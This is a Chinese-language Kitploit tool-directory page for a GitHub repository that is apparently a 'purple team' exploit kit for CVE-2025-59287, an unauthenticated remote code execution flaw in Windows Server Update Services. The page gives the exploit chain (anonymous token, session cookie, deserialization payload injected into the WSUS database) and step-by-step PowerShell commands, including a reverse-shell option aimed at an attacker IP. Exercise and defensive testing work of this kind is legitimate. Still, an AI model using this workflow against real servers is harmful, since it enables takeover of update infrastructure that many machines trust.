Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-59287-Exercise-Use — 紫色团队练习脚本,演示CVE-2025-59287,一个通过将恶意反序列化载荷注入WSUS数据库实现的未经授权的WSUS远程代码执行漏洞。 | Kitploit
工具/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
漏洞分析漏洞利用渗透测试学习与教育红队Payload 开发实验室与实践
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

紫色团队练习脚本,演示CVE-2025-59287,一个通过将恶意反序列化载荷注入WSUS数据库实现的未经授权的WSUS远程代码执行漏洞。

查看仓库
26个月前尚未审核
分享

CVE-2025-59287 — WSUS 未认证远程代码执行

针对 CVE-2025-59287(Windows Server Update Services 中的未认证远程代码执行漏洞)的紫队演练脚本。

仅限授权使用。 仅用于受控演练环境,针对你拥有或获得明确书面许可的系统。

工作原理

该漏洞利用可匿名访问的 WSUS SOAP 端点,将恶意的反序列化负载注入 WSUS 数据库。当 WSUS 管理控制台打开或触发同步时,负载将执行。

  1. WSUS 认证服务向任意匿名客户端颁发有效令牌
  2. 通过客户端 Web 服务将令牌交换为报告会话 Cookie
  3. 通过报告服务将恶意序列化对象注入 WSUS 数据库
  4. 当 WSUS 控制台加载或触发同步事件时,负载执行

要求

  • Windows 攻击机,安装 PowerShell 5.1+
  • 通过网络可访问 WSUS 的端口 8530
  • 将 ysoserial.net 放置在 ysoserial\Release\ 文件夹中(参见设置)

仓库结构

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # 验证目标是否存在漏洞
├── 2-generate.ps1    # 生成序列化负载 blob
├── 3-deliver.ps1     # 将负载投递到 WSUS 服务器
├── 4-verify.ps1      # 验证执行情况并清理
├── ysoserial/        # 在此放置 ysoserial.net 发行版(不提交)
│   └── Release/
│       └── ysoserial.exe
└── README.md

设置

克隆或下载仓库。添加 ysoserial.net,使路径匹配 ysoserial\Release\ysoserial.exe。

从以下位置下载 ysoserial.net: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 此操作默认会触发 Windows Defender 警报

使用方法

所有脚本均从仓库根目录运行。

1 — 检查

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — 生成

文件放置(无需监听器,建议优先使用):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

反弹 Shell:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — 投递

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — 触发

在 WSUS 服务器上,通过“开始 > Windows Server Update Services”打开管理控制台,或通过 PowerShell 触发同步:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — 验证与清理

验证执行情况:

root@kitploit:~
.\4-verify.ps1

验证并清理所有工件:

root@kitploit:~
.\4-verify.ps1 -Cleanup

通过攻击机管理共享进行操作:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

清理完成后,在 WSUS 控制台的“计算机”下移除演练计算机。

检测机会

参考

  • CVE-2025-59287 — 原始研究:hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
下载工具